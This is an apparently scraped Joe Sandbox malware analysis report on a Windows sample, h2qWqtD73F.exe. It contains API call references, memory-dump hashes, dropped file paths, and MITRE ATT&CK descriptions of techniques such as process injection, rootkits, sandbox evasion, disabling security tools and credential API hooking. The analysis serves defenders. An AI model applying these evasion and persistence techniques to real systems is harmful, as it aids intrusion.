GetProcessHeap.KERNEL32 ref: 0000029B92341E1E
HeapFree.KERNEL32 ref: 0000029B92341E2C

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 700f557b180df9136a5c64dc9698ff10a7cc329b8a59f04c22e2cb3883c3d761
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 7B217126E1CF9089FF529F69B50825AF3A0FB88BA4F054111DF8C47B14EF78C5828B00

Function 0000029B923A1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B923A127A
HeapAlloc.KERNEL32 ref: 0000029B923A1289
GetProcessHeap.KERNEL32 ref: 0000029B923A12A3
HeapAlloc.KERNEL32 ref: 0000029B923A12B4

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 2397a6ff4d7ed101b8dd00036cf46f17d3378354e60734d59a649f480c8a5633
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 96E06DB5E21610CAF705AF72E80836936E5FB88F21F48C024CA0907350DF7D849ACB40

Function 0000029B92341274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B9234127A
HeapAlloc.KERNEL32 ref: 0000029B92341289
GetProcessHeap.KERNEL32 ref: 0000029B923412A3
HeapAlloc.KERNEL32 ref: 0000029B923412B4

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 7cfa45c325f4326468341ed6818c342548e67e0008a4736dd6a743c44dea8bd8
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 36E0ED71E616008AF706AF76E91875976E1FB88F61F49C024CA4D07350DF7D859ACB90

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report h2qWqtD73F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kpqmiau.ne2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aerkav1p.4hz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af4wjmrs.atv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpcxif5k.10e.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efemmwms.ezy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eufprlp2.ijn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3p3zqr1.sx1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3kk0djh.h23.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvlwjjcu.mof.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_piva5423.e3p.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj23xulb.tql.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t42lexb5.ubb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uysomedt.40b.ps1

Windows Analysis Report
h2qWqtD73F.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre